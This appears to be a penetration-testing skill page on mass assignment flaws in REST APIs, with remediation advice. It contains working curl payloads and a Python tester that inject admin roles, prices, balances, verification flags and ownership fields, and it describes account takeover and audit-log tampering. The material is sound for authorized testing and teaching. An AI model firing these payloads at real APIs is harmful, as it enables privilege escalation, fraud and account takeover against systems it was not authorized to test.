Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-SkillsFramework mappings
MITRE ATT&CK
When to Use
- When testing REST APIs that accept JSON input for creating or updating resources
- During API security assessments of applications using ORM frameworks (Rails, Django, Laravel, Spring)
- When testing user registration, profile update, or account management endpoints
- During bug bounty hunting on applications with CRUD API operations
- When evaluating role-based access control implementation in API-driven applications
Prerequisites
- Burp Suite or Postman for API request crafting and interception
- Understanding of ORM auto-binding behavior in common frameworks
- API documentation or endpoint discovery through reconnaissance
- Multiple user accounts with different privilege levels for testing
- Knowledge of common sensitive fields (role, isAdmin, verified, balance, price)
- Arjun or param-miner for hidden parameter discovery
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1 — Discover API Structure and Fields
# Examine API responses to identify all object fields
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# Response reveals fields: id, username, email, role, isAdmin, verified, balance
# Check API documentation for exposed schemas
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml
# Use Arjun for hidden parameter discovery
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"
# Examine create/update request body vs response body
# The response may contain more fields than the request sends
# Those extra fields are mass assignment candidatesStep 2 — Test Privilege Escalation via Role Fields
# Inject role/admin fields in profile update
curl -X PUT http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"username":"testuser","email":"test@test.com","role":"admin"}'
# Try common admin field names
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"isAdmin":true}'
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'
# Test during registration
curl -X POST http://target.com/api/register \
-H "Content-Type: application/json" \
-d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'Step 3 — Test Financial and Business Logic Fields
# Modify price or balance fields
curl -X POST http://target.com/api/orders \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id":1,"quantity":1,"price":0.01}'
# Modify account balance
curl -X PATCH http://target.com/api/wallet \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"balance":999999}'
# Modify discount or coupon fields
curl -X POST http://target.com/api/checkout \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'
# Modify subscription tier
curl -X PATCH http://target.com/api/subscription \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"plan":"enterprise","price":0}'Step 4 — Test Verification and Status Fields
# Bypass email verification
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"email_verified":true,"verified":true,"active":true}'
# Modify account status
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"status":"active","banned":false,"suspended":false}'
# Modify ownership/organization
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'Step 5 — Test Relationship and Foreign Key Manipulation
# Change resource ownership
curl -X PATCH http://target.com/api/documents/123 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"owner_id":"admin-user-id"}'
# Assign to different group/team
curl -X PATCH http://target.com/api/projects/456 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"team_id":"privileged-team","access_level":"write"}'
# Modify created_at/updated_at for audit log manipulation
curl -X PATCH http://target.com/api/entries/789 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"created_at":"2020-01-01","created_by":"other-user-id"}'Step 6 — Automate Mass Assignment Testing
# Use Burp Intruder with field names wordlist
# Wordlist of common mass assignment fields:
# role, admin, isAdmin, is_admin, user_type, privilege, level
# verified, email_verified, active, banned, suspended
# balance, credits, price, discount, plan, tier
# owner_id, organization_id, team_id, group_id
# Python automation script
python3 mass_assignment_tester.py \
--url http://target.com/api/users/me \
--method PATCH \
--token "Bearer USER_TOKEN" \
--fields-file mass_assignment_fields.txt
# Nuclei mass assignment templates
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yamlKey Concepts
| Concept | Description |
|---|---|
| Mass Assignment | ORM auto-binding of request parameters to model attributes without restriction |
| Autobinding | Framework feature that maps HTTP parameters directly to object properties |
| Allowlist | Server-side list of permitted fields for update operations (strong_parameters in Rails) |
| Denylist | List of forbidden fields (less secure than allowlist approach) |
| Hidden Fields | Server-managed fields (role, balance) not shown in forms but accepted by API |
| DTO (Data Transfer Object) | Pattern using separate objects for input vs. database to prevent mass assignment |
| Parameter Pollution | Sending unexpected extra parameters alongside legitimate ones |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite | API request interception and parameter injection |
| Postman | API testing and collection-based mass assignment testing |
| Arjun | Hidden parameter discovery tool for API endpoints |
| param-miner | Burp extension for discovering hidden parameters |
| OWASP ZAP | Automated API scanning with parameter injection |
| swagger-codegen | Generate API clients from OpenAPI specs for testing |
Common Scenarios
- Admin Privilege Escalation — Inject
"role":"admin"or"isAdmin":truein profile update to gain administrative access - Price Manipulation — Modify
priceordiscountfields in order creation endpoints to purchase items at reduced cost - Email Verification Bypass — Set
email_verified:trueduring registration or profile update to bypass verification requirements - Account Takeover — Modify
emailorphonefields to attacker-controlled values, then trigger password reset - Subscription Upgrade — Inject
plan:"enterprise"in subscription update to gain premium features without payment
Output Format
## Mass Assignment Vulnerability Report
- **Target**: http://target.com/api/users/me
- **Method**: PATCH
- **Framework**: Ruby on Rails (detected via X-Powered-By)
### Findings
| # | Endpoint | Injected Field | Original | Modified | Impact |
|---|----------|---------------|----------|----------|--------|
| 1 | PATCH /api/users/me | role | "user" | "admin" | Privilege Escalation |
| 2 | POST /api/orders | price | 99.99 | 0.01 | Financial Loss |
| 3 | PATCH /api/users/me | email_verified | false | true | Verification Bypass |
### Remediation
- Implement allowlist (strong_parameters) for all model update operations
- Use DTOs/ViewModels to decouple API input from database models
- Apply field-level authorization checks on sensitive attributes
- Log and alert on attempts to modify restricted fieldsSource materials
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 1
api-reference.md2.4 KB
API Reference: Mass Assignment Vulnerability Testing
OWASP API3:2023 — Broken Object Property Level Authorization
Description
API accepts and processes fields that should not be client-settable. Attackers add extra fields (role, isAdmin) to modify server-side properties.
Common Vulnerable Fields
| Field | Impact |
|---|---|
role / isAdmin |
Privilege escalation |
permissions |
Authorization bypass |
verified / email_verified |
Account verification bypass |
balance / credits |
Financial manipulation |
plan / subscription |
Service tier elevation |
Testing Methodology
Step 1: Observe Normal Request
curl -X PUT https://api.target.com/users/me \
-H "Authorization: Bearer $TOKEN" \
-d '{"name": "Test User"}'Step 2: Add Privilege Fields
curl -X PUT https://api.target.com/users/me \
-H "Authorization: Bearer $TOKEN" \
-d '{"name": "Test User", "role": "admin", "isAdmin": true}'Step 3: Verify Changes
curl https://api.target.com/users/me -H "Authorization: Bearer $TOKEN"Python Testing Script
import requests
base_payload = {"name": "Test"}
privilege_fields = {
"role": "admin",
"isAdmin": True,
"permissions": ["*"],
}
for field, value in privilege_fields.items():
payload = {**base_payload, field: value}
resp = requests.put(url, json=payload, headers=headers)
if resp.status_code == 200 and field in resp.text:
print(f"VULNERABLE: {field} accepted")Framework-Specific Vulnerabilities
Ruby on Rails
# Vulnerable
User.new(params[:user])
# Fixed
User.new(params.require(:user).permit(:name, :email))Node.js/Express
// Vulnerable
User.findByIdAndUpdate(id, req.body)
// Fixed
const { name, email } = req.body;
User.findByIdAndUpdate(id, { name, email })Django REST Framework
# Vulnerable: all fields writable
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = '__all__'
# Fixed: explicit fields
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['name', 'email']
read_only_fields = ['role', 'is_admin']Remediation
- Use allowlists for acceptable fields (never blocklists)
- Implement read-only fields for sensitive properties
- Use separate DTOs for input and output
- Validate request schema against OpenAPI spec
Scripts 1
agent.py4.5 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""Agent for detecting mass assignment vulnerabilities in REST APIs."""
import argparse
import json
from datetime import datetime, timezone
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
PRIVILEGE_FIELDS = [
"role", "roles", "is_admin", "isAdmin", "admin", "privilege",
"permissions", "access_level", "user_type", "group", "groups",
"verified", "is_verified", "email_verified", "active", "is_active",
"approved", "is_approved", "subscription", "plan", "tier",
"credits", "balance", "discount",
]
def get_baseline_response(url, token=None):
"""Get baseline response to understand normal object structure."""
if not HAS_REQUESTS:
return {}
headers = {"Authorization": f"Bearer {token}"} if token else {}
try:
resp = requests.get(url, headers=headers, timeout=10, verify=False)
return resp.json()
except (requests.RequestException, json.JSONDecodeError):
return {}
def test_mass_assignment(url, method, base_data, extra_fields, token=None):
"""Test mass assignment by injecting extra fields in request body."""
if not HAS_REQUESTS:
return []
findings = []
headers = {"Authorization": f"Bearer {token}"} if token else {}
headers["Content-Type"] = "application/json"
for field in extra_fields:
test_values = {
"role": "admin",
"roles": ["admin"],
"is_admin": True,
"isAdmin": True,
"admin": True,
"permissions": ["*"],
"access_level": 999,
"verified": True,
"is_verified": True,
"active": True,
"is_active": True,
"credits": 99999,
"balance": 99999,
"plan": "enterprise",
}
payload = {**base_data, field: test_values.get(field, True)}
try:
if method.upper() == "POST":
resp = requests.post(url, json=payload, headers=headers, timeout=10, verify=False)
elif method.upper() == "PUT":
resp = requests.put(url, json=payload, headers=headers, timeout=10, verify=False)
elif method.upper() == "PATCH":
resp = requests.patch(url, json=payload, headers=headers, timeout=10, verify=False)
else:
continue
if resp.status_code in (200, 201):
resp_data = resp.json() if resp.headers.get("content-type", "").startswith("application/json") else {}
if field in str(resp_data):
findings.append({
"field": field,
"value_sent": test_values.get(field, True),
"status_code": resp.status_code,
"field_in_response": True,
"severity": "CRITICAL" if field in ("role", "is_admin", "admin", "permissions") else "HIGH",
})
except requests.RequestException:
continue
return findings
def main():
parser = argparse.ArgumentParser(
description="Detect mass assignment vulnerabilities in REST APIs (authorized testing only)"
)
parser.add_argument("--url", required=True, help="API endpoint URL")
parser.add_argument("--method", default="PUT", choices=["POST", "PUT", "PATCH"])
parser.add_argument("--data", required=True, help="Base request JSON data")
parser.add_argument("--token", help="Bearer token")
parser.add_argument("--fields", nargs="*", help="Custom fields to test")
parser.add_argument("--output", "-o", help="Output JSON report")
args = parser.parse_args()
print("[*] Mass Assignment Testing Agent")
print("[!] For authorized security testing only")
base_data = json.loads(args.data)
extra_fields = args.fields or PRIVILEGE_FIELDS
findings = test_mass_assignment(args.url, args.method, base_data, extra_fields, args.token)
report = {
"timestamp": datetime.now(timezone.utc).isoformat(),
"target": args.url,
"fields_tested": len(extra_fields),
"findings": findings,
"risk_level": "CRITICAL" if any(f["severity"] == "CRITICAL" for f in findings) else "HIGH" if findings else "LOW",
}
print(f"[*] Tested {len(extra_fields)} fields, {len(findings)} accepted")
if args.output:
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
print(f"[*] Report saved to {args.output}")
else:
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()
Keep exploring